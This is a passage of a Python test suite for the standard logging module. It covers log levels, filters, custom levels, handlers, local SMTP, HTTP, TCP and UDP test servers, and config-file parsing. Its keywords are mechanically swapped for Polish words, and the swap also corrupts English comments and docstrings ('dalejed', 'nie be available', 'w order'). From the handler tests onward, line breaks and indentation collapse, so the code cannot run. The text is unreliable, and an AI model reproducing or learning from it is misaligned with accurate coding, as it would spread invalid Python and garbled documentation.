    zaimportuj win32evtlog
wyjąwszy ImportError:
    win32evtlog = Nic
spróbuj:
    zaimportuj win32evtlogutil
wyjąwszy ImportError:
    win32evtlogutil = Nic
    win32evtlog = Nic
spróbuj:
    zaimportuj zlib
wyjąwszy ImportError:
    dalej


klasa BaseTest(unittest.TestCase):

    """Base class for logging tests."""

    # Format and matching pattern shared by the assertion helpers below.
    log_format = "%(name)s -> %(levelname)s: %(message)s"
    expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
    message_num = 0

    def setUp(self):
        """Setup the default logging stream to an internal StringIO instance,
        so that we can examine log output as we want."""
        logger_dict = logging.getLogger().manager.loggerDict
        logging._acquireLock()
        spróbuj:
            # Snapshot the global logging state so tearDown can restore it.
            self.saved_handlers = logging._handlers.copy()
            self.saved_handler_list = logging._handlerList[:]
            self.saved_loggers = saved_loggers = logger_dict.copy()
            self.saved_name_to_level = logging._nameToLevel.copy()
            self.saved_level_to_name = logging._levelToName.copy()
            self.logger_states = logger_states = {}
            dla name w saved_loggers:
                logger_states[name] = getattr(saved_loggers[name],
                                              'disabled', Nic)
        w_końcu:
            logging._releaseLock()

        # Set two unused loggers
        self.logger1 = logging.getLogger("\xab\xd7\xbb")
        self.logger2 = logging.getLogger("\u013f\u00d6\u0047")

        self.root_logger = logging.getLogger("")
        self.original_logging_level = self.root_logger.getEffectiveLevel()

        # Route root-logger output into a StringIO for inspection.
        self.stream = io.StringIO()
        self.root_logger.setLevel(logging.DEBUG)
        self.root_hdlr = logging.StreamHandler(self.stream)
        self.root_formatter = logging.Formatter(self.log_format)
        self.root_hdlr.setFormatter(self.root_formatter)
        jeżeli self.logger1.hasHandlers():
            hlist = self.logger1.handlers + self.root_logger.handlers
            podnieś AssertionError('Unexpected handlers: %s' % hlist)
        jeżeli self.logger2.hasHandlers():
            hlist = self.logger2.handlers + self.root_logger.handlers
            podnieś AssertionError('Unexpected handlers: %s' % hlist)
        self.root_logger.addHandler(self.root_hdlr)
        self.assertPrawda(self.logger1.hasHandlers())
        self.assertPrawda(self.logger2.hasHandlers())

    def tearDown(self):
        """Remove our logging stream, and restore the original logging
        level."""
        self.stream.close()
        self.root_logger.removeHandler(self.root_hdlr)
        dopóki self.root_logger.handlers:
            h = self.root_logger.handlers[0]
            self.root_logger.removeHandler(h)
            h.close()
        self.root_logger.setLevel(self.original_logging_level)
        logging._acquireLock()
        spróbuj:
            # Restore the global logging state captured in setUp.
            logging._levelToName.clear()
            logging._levelToName.update(self.saved_level_to_name)
            logging._nameToLevel.clear()
            logging._nameToLevel.update(self.saved_name_to_level)
            logging._handlers.clear()
            logging._handlers.update(self.saved_handlers)
            logging._handlerList[:] = self.saved_handler_list
            loggerDict = logging.getLogger().manager.loggerDict
            loggerDict.clear()
            loggerDict.update(self.saved_loggers)
            logger_states = self.logger_states
            dla name w self.logger_states:
                jeżeli logger_states[name] jest nie Nic:
                    self.saved_loggers[name].disabled = logger_states[name]
        w_końcu:
            logging._releaseLock()

    def assert_log_lines(self, expected_values, stream=Nic, pat=Nic):
        """Match the collected log lines against the regular expression
        self.expected_log_pat, and compare the extracted group values to
        the expected_values list of tuples."""
        stream = stream albo self.stream
        pat = re.compile(pat albo self.expected_log_pat)
        actual_lines = stream.getvalue().splitlines()
        self.assertEqual(len(actual_lines), len(expected_values))
        dla actual, expected w zip(actual_lines, expected_values):
            match = pat.search(actual)
            jeżeli nie match:
                self.fail("Log line does nie match expected pattern:\n" +
                          actual)
            self.assertEqual(tuple(match.groups()), expected)
        s = stream.read()
        jeżeli s:
            self.fail("Remaining output at end of log stream:\n" + s)

    def next_message(self):
        """Generate a message consisting solely of an auto-incrementing
        integer."""
        self.message_num += 1
        zwróć "%d" % self.message_num


klasa BuiltinLevelsTest(BaseTest):

    """Test builtin levels and their inheritance."""

    def test_flat(self):
        # Logging levels in a flat logger namespace.
        m = self.next_message

        ERR = logging.getLogger("ERR")
        ERR.setLevel(logging.ERROR)
        INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
        INF.setLevel(logging.INFO)
        DEB = logging.getLogger("DEB")
        DEB.setLevel(logging.DEBUG)

        # These should log.
        ERR.log(logging.CRITICAL, m())
        ERR.error(m())

        INF.log(logging.CRITICAL, m())
        INF.error(m())
        INF.warning(m())
        INF.info(m())

        DEB.log(logging.CRITICAL, m())
        DEB.error(m())
        DEB.warning(m())
        DEB.info(m())
        DEB.debug(m())

        # These should not log.
        ERR.warning(m())
        ERR.info(m())
        ERR.debug(m())

        INF.debug(m())

        self.assert_log_lines([
            ('ERR', 'CRITICAL', '1'),
            ('ERR', 'ERROR', '2'),
            ('INF', 'CRITICAL', '3'),
            ('INF', 'ERROR', '4'),
            ('INF', 'WARNING', '5'),
            ('INF', 'INFO', '6'),
            ('DEB', 'CRITICAL', '7'),
            ('DEB', 'ERROR', '8'),
            ('DEB', 'WARNING', '9'),
            ('DEB', 'INFO', '10'),
            ('DEB', 'DEBUG', '11'),
        ])

    def test_nested_explicit(self):
        # Logging levels in a nested namespace, all explicitly set.
        m = self.next_message

        INF = logging.getLogger("INF")
        INF.setLevel(logging.INFO)
        INF_ERR = logging.getLogger("INF.ERR")
        INF_ERR.setLevel(logging.ERROR)

        # These should log.
        INF_ERR.log(logging.CRITICAL, m())
        INF_ERR.error(m())

        # These should not log.
        INF_ERR.warning(m())
        INF_ERR.info(m())
        INF_ERR.debug(m())

        self.assert_log_lines([
            ('INF.ERR', 'CRITICAL', '1'),
            ('INF.ERR', 'ERROR', '2'),
        ])

    def test_nested_inherited(self):
        # Logging levels in a nested namespace, inherited from parent loggers.
        m = self.next_message

        INF = logging.getLogger("INF")
        INF.setLevel(logging.INFO)
        INF_ERR = logging.getLogger("INF.ERR")
        INF_ERR.setLevel(logging.ERROR)
        INF_UNDEF = logging.getLogger("INF.UNDEF")
        INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
        UNDEF = logging.getLogger("UNDEF")

        # These should log.
        INF_UNDEF.log(logging.CRITICAL, m())
        INF_UNDEF.error(m())
        INF_UNDEF.warning(m())
        INF_UNDEF.info(m())
        INF_ERR_UNDEF.log(logging.CRITICAL, m())
        INF_ERR_UNDEF.error(m())

        # These should not log.
        INF_UNDEF.debug(m())
        INF_ERR_UNDEF.warning(m())
        INF_ERR_UNDEF.info(m())
        INF_ERR_UNDEF.debug(m())

        self.assert_log_lines([
            ('INF.UNDEF', 'CRITICAL', '1'),
            ('INF.UNDEF', 'ERROR', '2'),
            ('INF.UNDEF', 'WARNING', '3'),
            ('INF.UNDEF', 'INFO', '4'),
            ('INF.ERR.UNDEF', 'CRITICAL', '5'),
            ('INF.ERR.UNDEF', 'ERROR', '6'),
        ])

    def test_nested_with_virtual_parent(self):
        # Logging levels when some parent does not exist yet.
        m = self.next_message

        INF = logging.getLogger("INF")
        GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
        CHILD = logging.getLogger("INF.BADPARENT")
        INF.setLevel(logging.INFO)

        # These should log.
        GRANDCHILD.log(logging.FATAL, m())
        GRANDCHILD.info(m())
        CHILD.log(logging.FATAL, m())
        CHILD.info(m())

        # These should not log.
        GRANDCHILD.debug(m())
        CHILD.debug(m())

        self.assert_log_lines([
            ('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
            ('INF.BADPARENT.UNDEF', 'INFO', '2'),
            ('INF.BADPARENT', 'CRITICAL', '3'),
            ('INF.BADPARENT', 'INFO', '4'),
        ])

    def test_regression_22386(self):
        """See issue #22386 for more information."""
        self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
        self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')


klasa BasicFilterTest(BaseTest):

    """Test the bundled Filter class."""

    def test_filter(self):
        # Only messages satisfying the specified criteria pass through the
        # filter.
        filter_ = logging.Filter("spam.eggs")
        handler = self.root_logger.handlers[0]
        spróbuj:
            handler.addFilter(filter_)
            spam = logging.getLogger("spam")
            spam_eggs = logging.getLogger("spam.eggs")
            spam_eggs_fish = logging.getLogger("spam.eggs.fish")
            spam_bakedbeans = logging.getLogger("spam.bakedbeans")

            spam.info(self.next_message())
            spam_eggs.info(self.next_message())  # Good.
            spam_eggs_fish.info(self.next_message())  # Good.
            spam_bakedbeans.info(self.next_message())

            self.assert_log_lines([
                ('spam.eggs', 'INFO', '2'),
                ('spam.eggs.fish', 'INFO', '3'),
            ])
        w_końcu:
            handler.removeFilter(filter_)

    def test_callable_filter(self):
        # Only messages satisfying the specified criteria pass through the
        # filter.
        def filterfunc(record):
            parts = record.name.split('.')
            prefix = '.'.join(parts[:2])
            zwróć prefix == 'spam.eggs'

        handler = self.root_logger.handlers[0]
        spróbuj:
            handler.addFilter(filterfunc)
            spam = logging.getLogger("spam")
            spam_eggs = logging.getLogger("spam.eggs")
            spam_eggs_fish = logging.getLogger("spam.eggs.fish")
            spam_bakedbeans = logging.getLogger("spam.bakedbeans")

            spam.info(self.next_message())
            spam_eggs.info(self.next_message())  # Good.
            spam_eggs_fish.info(self.next_message())  # Good.
            spam_bakedbeans.info(self.next_message())

            self.assert_log_lines([
                ('spam.eggs', 'INFO', '2'),
                ('spam.eggs.fish', 'INFO', '3'),
            ])
        w_końcu:
            handler.removeFilter(filterfunc)

    def test_empty_filter(self):
        f = logging.Filter()
        r = logging.makeLogRecord({'name': 'spam.eggs'})
        self.assertPrawda(f.filter(r))

#
#   First, we define our levels. There can be as many as you want - the only
#   limitations are that they should be integers, the lowest should be > 0 and
#   larger values mean less information being logged. If you need specific
#   level values which do not fit into these limitations, you can use a
#   mapping dictionary to convert between your application levels and the
#   logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111

LEVEL_RANGE = range(BORING, SILENT + 1)

#
#   Next, we define names for our levels. You don't need to do this - in which
#   case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
    SILENT: 'Silent',
    TACITURN: 'Taciturn',
    TERSE: 'Terse',
    EFFUSIVE: 'Effusive',
    SOCIABLE: 'Sociable',
    VERBOSE: 'Verbose',
    TALKATIVE: 'Talkative',
    GARRULOUS: 'Garrulous',
    CHATTERBOX: 'Chatterbox',
    BORING: 'Boring',
}


klasa GarrulousFilter(logging.Filter):

    """A filter which blocks garrulous messages."""

    def filter(self, record):
        zwróć record.levelno != GARRULOUS


klasa VerySpecificFilter(logging.Filter):

    """A filter which blocks sociable and taciturn messages."""

    def filter(self, record):
        zwróć record.levelno nie w [SOCIABLE, TACITURN]


klasa CustomLevelsAndFiltersTest(BaseTest):

    """Test various filtering possibilities with custom logging levels."""

    # Skip the logger name group.
    expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"

    def setUp(self):
        BaseTest.setUp(self)
        dla k, v w my_logging_levels.items():
            logging.addLevelName(k, v)

    def log_at_all_levels(self, logger):
        dla lvl w LEVEL_RANGE:
            logger.log(lvl, self.next_message())

    def test_logger_filter(self):
        # Filter at logger level.
        self.root_logger.setLevel(VERBOSE)
        # Levels >= 'Verbose' are good.
        self.log_at_all_levels(self.root_logger)
        self.assert_log_lines([
            ('Verbose', '5'),
            ('Sociable', '6'),
            ('Effusive', '7'),
            ('Terse', '8'),
            ('Taciturn', '9'),
            ('Silent', '10'),
        ])

    def test_handler_filter(self):
        # Filter at handler level.
        self.root_logger.handlers[0].setLevel(SOCIABLE)
        spróbuj:
            # Levels >= 'Sociable' are good.
            self.log_at_all_levels(self.root_logger)
            self.assert_log_lines([
                ('Sociable', '6'),
                ('Effusive', '7'),
                ('Terse', '8'),
                ('Taciturn', '9'),
                ('Silent', '10'),
            ])
        w_końcu:
            self.root_logger.handlers[0].setLevel(logging.NOTSET)

    def test_specific_filters(self):
        # Set a specific filter object on the handler, and then add another
        # filter object on the logger itself.
        handler = self.root_logger.handlers[0]
        specific_filter = Nic
        garr = GarrulousFilter()
        handler.addFilter(garr)
        spróbuj:
            self.log_at_all_levels(self.root_logger)
            first_lines = [
                # Notice how 'Garrulous' is missing
                ('Boring', '1'),
                ('Chatterbox', '2'),
                ('Talkative', '4'),
                ('Verbose', '5'),
                ('Sociable', '6'),
                ('Effusive', '7'),
                ('Terse', '8'),
                ('Taciturn', '9'),
                ('Silent', '10'),
            ]
            self.assert_log_lines(first_lines)

            specific_filter = VerySpecificFilter()
            self.root_logger.addFilter(specific_filter)
            self.log_at_all_levels(self.root_logger)
            self.assert_log_lines(first_lines + [
                # Not only 'Garrulous' is still missing, but also 'Sociable'
                # and 'Taciturn'
                ('Boring', '11'),
                ('Chatterbox', '12'),
                ('Talkative', '14'),
                ('Verbose', '15'),
                ('Effusive', '17'),
                ('Terse', '18'),
                ('Silent', '20'),
            ])
        w_końcu:
            jeżeli specific_filter:
                self.root_logger.removeFilter(specific_filter)
            handler.removeFilter(garr)


klasa HandlerTest(BaseTest):

    def test_name(self):
        h = logging.Handler()
        h.name = 'generic'
        self.assertEqual(h.name, 'generic')
        h.name = 'anothergeneric'
        self.assertEqual(h.name, 'anothergeneric')
        self.assertRaises(NotImplementedError, h.emit, Nic)

    def test_builtin_handlers(self):
        # We can't actually *use* too many handlers in the tests,
        # but we can try instantiating them with various options
        jeżeli sys.platform w ('linux', 'darwin'):
            dla existing w (Prawda, Nieprawda):
                fd, fn = tempfile.mkstemp()
                os.close(fd)
                jeżeli nie existing:
                    os.unlink(fn)
                h = logging.handlers.WatchedFileHandler(fn, delay=Prawda)
                jeżeli existing:
                    dev, ino = h.dev, h.ino
                    self.assertEqual(dev, -1)
                    self.assertEqual(ino, -1)
                    r = logging.makeLogRecord({'msg': 'Test'})
                    h.handle(r)
                    # Now remove the file.
                    os.unlink(fn)
                    self.assertNieprawda(os.path.exists(fn))
                    # The next call should recreate the file.
h.handle(r) self.assertPrawda(os.path.exists(fn)) inaczej: self.assertEqual(h.dev, -1) self.assertEqual(h.ino, -1) h.close() jeżeli existing: os.unlink(fn) jeżeli sys.platform == 'darwin': sockname = '/var/run/syslog' inaczej: sockname = '/dev/log' spróbuj: h = logging.handlers.SysLogHandler(sockname) self.assertEqual(h.facility, h.LOG_USER) self.assertPrawda(h.unixsocket) h.close() wyjąwszy OSError: # syslogd might nie be available dalej dla method w ('GET', 'POST', 'PUT'): jeżeli method == 'PUT': self.assertRaises(ValueError, logging.handlers.HTTPHandler, 'localhost', '/log', method) inaczej: h = logging.handlers.HTTPHandler('localhost', '/log', method) h.close() h = logging.handlers.BufferingHandler(0) r = logging.makeLogRecord({}) self.assertPrawda(h.shouldFlush(r)) h.close() h = logging.handlers.BufferingHandler(1) self.assertNieprawda(h.shouldFlush(r)) h.close() @unittest.skipIf(os.name == 'nt', 'WatchedFileHandler nie appropriate dla Windows.') @unittest.skipUnless(threading, 'Threading required dla this test.') def test_race(self): # Issue #14632 refers. 
def remove_loop(fname, tries): dla _ w range(tries): spróbuj: os.unlink(fname) self.deletion_time = time.time() wyjąwszy OSError: dalej time.sleep(0.004 * random.randint(0, 4)) del_count = 500 log_count = 500 self.handle_time = Nic self.deletion_time = Nic dla delay w (Nieprawda, Prawda): fd, fn = tempfile.mkstemp('.log', 'test_logging-3-') os.close(fd) remover = threading.Thread(target=remove_loop, args=(fn, del_count)) remover.daemon = Prawda remover.start() h = logging.handlers.WatchedFileHandler(fn, delay=delay) f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s') h.setFormatter(f) spróbuj: dla _ w range(log_count): time.sleep(0.005) r = logging.makeLogRecord({'msg': 'testing' }) spróbuj: self.handle_time = time.time() h.handle(r) wyjąwszy Exception: print('Deleted at %s, ' 'opened at %s' % (self.deletion_time, self.handle_time)) podnieś w_końcu: remover.join() h.close() jeżeli os.path.exists(fn): os.unlink(fn) klasa BadStream(object): def write(self, data): podnieś RuntimeError('deliberate mistake') klasa TestStreamHandler(logging.StreamHandler): def handleError(self, record): self.error_record = record klasa StreamHandlerTest(BaseTest): def test_error_handling(self): h = TestStreamHandler(BadStream()) r = logging.makeLogRecord({}) old_raise = logging.raiseExceptions spróbuj: h.handle(r) self.assertIs(h.error_record, r) h = logging.StreamHandler(BadStream()) przy support.captured_stderr() jako stderr: h.handle(r) msg = '\nRuntimeError: deliberate mistake\n' self.assertIn(msg, stderr.getvalue()) logging.raiseExceptions = Nieprawda przy support.captured_stderr() jako stderr: h.handle(r) self.assertEqual('', stderr.getvalue()) w_końcu: logging.raiseExceptions = old_raise # -- The following section could be moved into a server_helper.py module # -- jeżeli it proves to be of wider utility than just test_logging jeżeli threading: klasa TestSMTPServer(smtpd.SMTPServer): """ This klasa implements a test SMTP server. 
:param addr: A (host, port) tuple which the server listens on. You can specify a port value of zero: the server's *port* attribute will hold the actual port number used, which can be used w client connections. :param handler: A callable which will be called to process incoming messages. The handler will be dalejed the client address tuple, who the message jest from, a list of recipients oraz the message data. :param poll_interval: The interval, w seconds, used w the underlying :func:`select` albo :func:`poll` call by :func:`asyncore.loop`. :param sockmap: A dictionary which will be used to hold :class:`asyncore.dispatcher` instances used by :func:`asyncore.loop`. This avoids changing the :mod:`asyncore` module's global state. """ def __init__(self, addr, handler, poll_interval, sockmap): smtpd.SMTPServer.__init__(self, addr, Nic, map=sockmap, decode_data=Prawda) self.port = self.socket.getsockname()[1] self._handler = handler self._thread = Nic self.poll_interval = poll_interval def process_message(self, peer, mailfrom, rcpttos, data): """ Delegates to the handler dalejed w to the server's constructor. Typically, this will be a test case method. :param peer: The client (host, port) tuple. :param mailfrom: The address of the sender. :param rcpttos: The addresses of the recipients. :param data: The message. """ self._handler(peer, mailfrom, rcpttos, data) def start(self): """ Start the server running on a separate daemon thread. """ self._thread = t = threading.Thread(target=self.serve_forever, args=(self.poll_interval,)) t.setDaemon(Prawda) t.start() def serve_forever(self, poll_interval): """ Run the :mod:`asyncore` loop until normal termination conditions arise. :param poll_interval: The interval, w seconds, used w the underlying :func:`select` albo :func:`poll` call by :func:`asyncore.loop`. """ spróbuj: asyncore.loop(poll_interval, map=self._map) wyjąwszy OSError: # On FreeBSD 8, closing the server repeatably # podnieśs this error. 
We swallow it jeżeli the # server has been closed. jeżeli self.connected albo self.accepting: podnieś def stop(self, timeout=Nic): """ Stop the thread by closing the server instance. Wait dla the server thread to terminate. :param timeout: How long to wait dla the server thread to terminate. """ self.close() self._thread.join(timeout) self._thread = Nic klasa ControlMixin(object): """ This mixin jest used to start a server on a separate thread, oraz shut it down programmatically. Request handling jest simplified - instead of needing to derive a suitable RequestHandler subclass, you just provide a callable which will be dalejed each received request to be processed. :param handler: A handler callable which will be called przy a single parameter - the request - w order to process the request. This handler jest called on the server thread, effectively meaning that requests are processed serially. While nie quite Web scale ;-), this should be fine dla testing applications. :param poll_interval: The polling interval w seconds. """ def __init__(self, handler, poll_interval): self._thread = Nic self.poll_interval = poll_interval self._handler = handler self.ready = threading.Event() def start(self): """ Create a daemon thread to run the server, oraz start it. """ self._thread = t = threading.Thread(target=self.serve_forever, args=(self.poll_interval,)) t.setDaemon(Prawda) t.start() def serve_forever(self, poll_interval): """ Run the server. Set the ready flag before entering the service loop. """ self.ready.set() super(ControlMixin, self).serve_forever(poll_interval) def stop(self, timeout=Nic): """ Tell the server thread to stop, oraz wait dla it to do so. :param timeout: How long to wait dla the server thread to terminate. 
""" self.shutdown() jeżeli self._thread jest nie Nic: self._thread.join(timeout) self._thread = Nic self.server_close() self.ready.clear() klasa TestHTTPServer(ControlMixin, HTTPServer): """ An HTTP server which jest controllable using :class:`ControlMixin`. :param addr: A tuple przy the IP address oraz port to listen on. :param handler: A handler callable which will be called przy a single parameter - the request - w order to process the request. :param poll_interval: The polling interval w seconds. :param log: Pass ``Prawda`` to enable log messages. """ def __init__(self, addr, handler, poll_interval=0.5, log=Nieprawda, sslctx=Nic): klasa DelegatingHTTPRequestHandler(BaseHTTPRequestHandler): def __getattr__(self, name, default=Nic): jeżeli name.startswith('do_'): zwróć self.process_request podnieś AttributeError(name) def process_request(self): self.server._handler(self) def log_message(self, format, *args): jeżeli log: super(DelegatingHTTPRequestHandler, self).log_message(format, *args) HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler) ControlMixin.__init__(self, handler, poll_interval) self.sslctx = sslctx def get_request(self): spróbuj: sock, addr = self.socket.accept() jeżeli self.sslctx: sock = self.sslctx.wrap_socket(sock, server_side=Prawda) wyjąwszy OSError jako e: # socket errors are silenced by the caller, print them here sys.stderr.write("Got an error:\n%s\n" % e) podnieś zwróć sock, addr klasa TestTCPServer(ControlMixin, ThreadingTCPServer): """ A TCP server which jest controllable using :class:`ControlMixin`. :param addr: A tuple przy the IP address oraz port to listen on. :param handler: A handler callable which will be called przy a single parameter - the request - w order to process the request. :param poll_interval: The polling interval w seconds. :bind_and_activate: If Prawda (the default), binds the server oraz starts it listening. 
If Nieprawda, you need to call :meth:`server_bind` oraz :meth:`server_activate` at some later time before calling :meth:`start`, so that the server will set up the socket oraz listen on it. """ allow_reuse_address = Prawda def __init__(self, addr, handler, poll_interval=0.5, bind_and_activate=Prawda): klasa DelegatingTCPRequestHandler(StreamRequestHandler): def handle(self): self.server._handler(self) ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler, bind_and_activate) ControlMixin.__init__(self, handler, poll_interval) def server_bind(self): super(TestTCPServer, self).server_bind() self.port = self.socket.getsockname()[1] klasa TestUDPServer(ControlMixin, ThreadingUDPServer): """ A UDP server which jest controllable using :class:`ControlMixin`. :param addr: A tuple przy the IP address oraz port to listen on. :param handler: A handler callable which will be called przy a single parameter - the request - w order to process the request. :param poll_interval: The polling interval dla shutdown requests, w seconds. :bind_and_activate: If Prawda (the default), binds the server oraz starts it listening. If Nieprawda, you need to call :meth:`server_bind` oraz :meth:`server_activate` at some later time before calling :meth:`start`, so that the server will set up the socket oraz listen on it. 
""" def __init__(self, addr, handler, poll_interval=0.5, bind_and_activate=Prawda): klasa DelegatingUDPRequestHandler(DatagramRequestHandler): def handle(self): self.server._handler(self) def finish(self): data = self.wfile.getvalue() jeżeli data: spróbuj: super(DelegatingUDPRequestHandler, self).finish() wyjąwszy OSError: jeżeli nie self.server._closed: podnieś ThreadingUDPServer.__init__(self, addr, DelegatingUDPRequestHandler, bind_and_activate) ControlMixin.__init__(self, handler, poll_interval) self._closed = Nieprawda def server_bind(self): super(TestUDPServer, self).server_bind() self.port = self.socket.getsockname()[1] def server_close(self): super(TestUDPServer, self).server_close() self._closed = Prawda jeżeli hasattr(socket, "AF_UNIX"): klasa TestUnixStreamServer(TestTCPServer): address_family = socket.AF_UNIX klasa TestUnixDatagramServer(TestUDPServer): address_family = socket.AF_UNIX # - end of server_helper section @unittest.skipUnless(threading, 'Threading required dla this test.') klasa SMTPHandlerTest(BaseTest): TIMEOUT = 8.0 def test_basic(self): sockmap = {} server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001, sockmap) server.start() addr = (support.HOST, server.port) h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log', timeout=self.TIMEOUT) self.assertEqual(h.toaddrs, ['you']) self.messages = [] r = logging.makeLogRecord({'msg': 'Hello'}) self.handled = threading.Event() h.handle(r) self.handled.wait(self.TIMEOUT) # 14314: don't wait forever server.stop() self.assertPrawda(self.handled.is_set()) self.assertEqual(len(self.messages), 1) peer, mailfrom, rcpttos, data = self.messages[0] self.assertEqual(mailfrom, 'me') self.assertEqual(rcpttos, ['you']) self.assertIn('\nSubject: Log\n', data) self.assertPrawda(data.endswith('\n\nHello')) h.close() def process_message(self, *args): self.messages.append(args) self.handled.set() klasa MemoryHandlerTest(BaseTest): """Tests dla the MemoryHandler.""" # Do nie bother przy a logger 
name group. expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$" def setUp(self): BaseTest.setUp(self) self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING, self.root_hdlr) self.mem_logger = logging.getLogger('mem') self.mem_logger.propagate = 0 self.mem_logger.addHandler(self.mem_hdlr) def tearDown(self): self.mem_hdlr.close() BaseTest.tearDown(self) def test_flush(self): # The memory handler flushes to its target handler based on specific # criteria (message count oraz message level). self.mem_logger.debug(self.next_message()) self.assert_log_lines([]) self.mem_logger.info(self.next_message()) self.assert_log_lines([]) # This will flush because the level jest >= logging.WARNING self.mem_logger.warning(self.next_message()) lines = [ ('DEBUG', '1'), ('INFO', '2'), ('WARNING', '3'), ] self.assert_log_lines(lines) dla n w (4, 14): dla i w range(9): self.mem_logger.debug(self.next_message()) self.assert_log_lines(lines) # This will flush because it's the 10th message since the last # flush. self.mem_logger.debug(self.next_message()) lines = lines + [('DEBUG', str(i)) dla i w range(n, n + 10)] self.assert_log_lines(lines) self.mem_logger.debug(self.next_message()) self.assert_log_lines(lines) klasa ExceptionFormatter(logging.Formatter): """A special exception formatter.""" def formatException(self, ei): zwróć "Got a [%s]" % ei[0].__name__ klasa ConfigFileTest(BaseTest): """Reading logging config z a .ini-style config file.""" expected_log_pat = r"^(\w+) \+\+ (\w+)$" # config0 jest a standard configuration. config0 = """ [loggers] keys=root [handlers] keys=hand1 [formatters] keys=form1 [logger_root] level=WARNING handlers=hand1 [handler_hand1] class=StreamHandler level=NOTSET formatter=form1 args=(sys.stdout,) [formatter_form1] format=%(levelname)s ++ %(message)s datefmt= """ # config1 adds a little to the standard configuration. 
config1 = """ [loggers] keys=root,parser [handlers] keys=hand1 [formatters] keys=form1 [logger_root] level=WARNING handlers= [logger_parser] level=DEBUG handlers=hand1 propagate=1 qualname=compiler.parser [handler_hand1] class=StreamHandler level=NOTSET formatter=form1 args=(sys.stdout,) [formatter_form1] format=%(levelname)s ++ %(message)s datefmt= """ # config1a moves the handler to the root. config1a = """ [loggers] keys=root,parser [handlers] keys=hand1 [formatters] keys=form1 [logger_root] level=WARNING handlers=hand1 [logger_parser] level=DEBUG handlers= propagate=1 qualname=compiler.parser [handler_hand1] class=StreamHandler level=NOTSET formatter=form1 args=(sys.stdout,) [formatter_form1] format=%(levelname)s ++ %(message)s datefmt= """ # config2 has a subtle configuration error that should be reported config2 = config1.replace("sys.stdout", "sys.stbout") # config3 has a less subtle configuration error config3 = config1.replace("formatter=form1", "formatter=misspelled_name") # config4 specifies a custom formatter klasa to be loaded config4 = """ [loggers] keys=root [handlers] keys=hand1 [formatters] keys=form1 [logger_root] level=NOTSET handlers=hand1 [handler_hand1] class=StreamHandler level=NOTSET formatter=form1 args=(sys.stdout,) [formatter_form1] class=""" + __name__ + """.ExceptionFormatter format=%(levelname)s:%(name)s:%(message)s datefmt= """ # config5 specifies a custom handler klasa to be loaded config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler') # config6 uses ', ' delimiters w the handlers oraz formatters sections config6 = """ [loggers] keys=root,parser [handlers] keys=hand1, hand2 [formatters] keys=form1, form2 [logger_root] level=WARNING handlers= [logger_parser] level=DEBUG handlers=hand1 propagate=1 qualname=compiler.parser [handler_hand1] class=StreamHandler level=NOTSET formatter=form1 args=(sys.stdout,) [handler_hand2] class=StreamHandler level=NOTSET formatter=form1 args=(sys.stderr,) [formatter_form1] 
format=%(levelname)s ++ %(message)s datefmt= [formatter_form2] format=%(message)s datefmt= """ # config7 adds a compiler logger. config7 = """ [loggers] keys=root,parser,compiler [handlers] keys=hand1 [formatters] keys=form1 [logger_root] level=WARNING handlers=hand1 [logger_compiler] level=DEBUG handlers= propagate=1 qualname=compiler [logger_parser] level=DEBUG handlers= propagate=1 qualname=compiler.parser [handler_hand1] class=StreamHandler level=NOTSET formatter=form1 args=(sys.stdout,) [formatter_form1] format=%(levelname)s ++ %(message)s datefmt= """ disable_test = """ [loggers] keys=root [handlers] keys=screen [formatters] keys= [logger_root] level=DEBUG handlers=screen [handler_screen] level=DEBUG class=StreamHandler args=(sys.stdout,) formatter= """ def apply_config(self, conf, **kwargs): file = io.StringIO(textwrap.dedent(conf)) logging.config.fileConfig(file, **kwargs) def test_config0_ok(self): # A simple config file which overrides the default settings. przy support.captured_stdout() jako output: self.apply_config(self.config0) logger = logging.getLogger() # Won't output anything logger.info(self.next_message()) # Outputs a message logger.error(self.next_message()) self.assert_log_lines([ ('ERROR', '2'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) def test_config0_using_cp_ok(self): # A simple config file which overrides the default settings. przy support.captured_stdout() jako output: file = io.StringIO(textwrap.dedent(self.config0)) cp = configparser.ConfigParser() cp.read_file(file) logging.config.fileConfig(cp) logger = logging.getLogger() # Won't output anything logger.info(self.next_message()) # Outputs a message logger.error(self.next_message()) self.assert_log_lines([ ('ERROR', '2'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) def test_config1_ok(self, config=config1): # A config file defining a sub-parser jako well. 
przy support.captured_stdout() jako output: self.apply_config(config) logger = logging.getLogger("compiler.parser") # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) self.assert_log_lines([ ('INFO', '1'), ('ERROR', '2'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) def test_config2_failure(self): # A simple config file which overrides the default settings. self.assertRaises(Exception, self.apply_config, self.config2) def test_config3_failure(self): # A simple config file which overrides the default settings. self.assertRaises(Exception, self.apply_config, self.config3) def test_config4_ok(self): # A config file specifying a custom formatter class. przy support.captured_stdout() jako output: self.apply_config(self.config4) logger = logging.getLogger() spróbuj: podnieś RuntimeError() wyjąwszy RuntimeError: logging.exception("just testing") sys.stdout.seek(0) self.assertEqual(output.getvalue(), "ERROR:root:just testing\nGot a [RuntimeError]\n") # Original logger output jest empty self.assert_log_lines([]) def test_config5_ok(self): self.test_config1_ok(config=self.config5) def test_config6_ok(self): self.test_config1_ok(config=self.config6) def test_config7_ok(self): przy support.captured_stdout() jako output: self.apply_config(self.config1a) logger = logging.getLogger("compiler.parser") # See issue #11424. compiler-hyphenated sorts # between 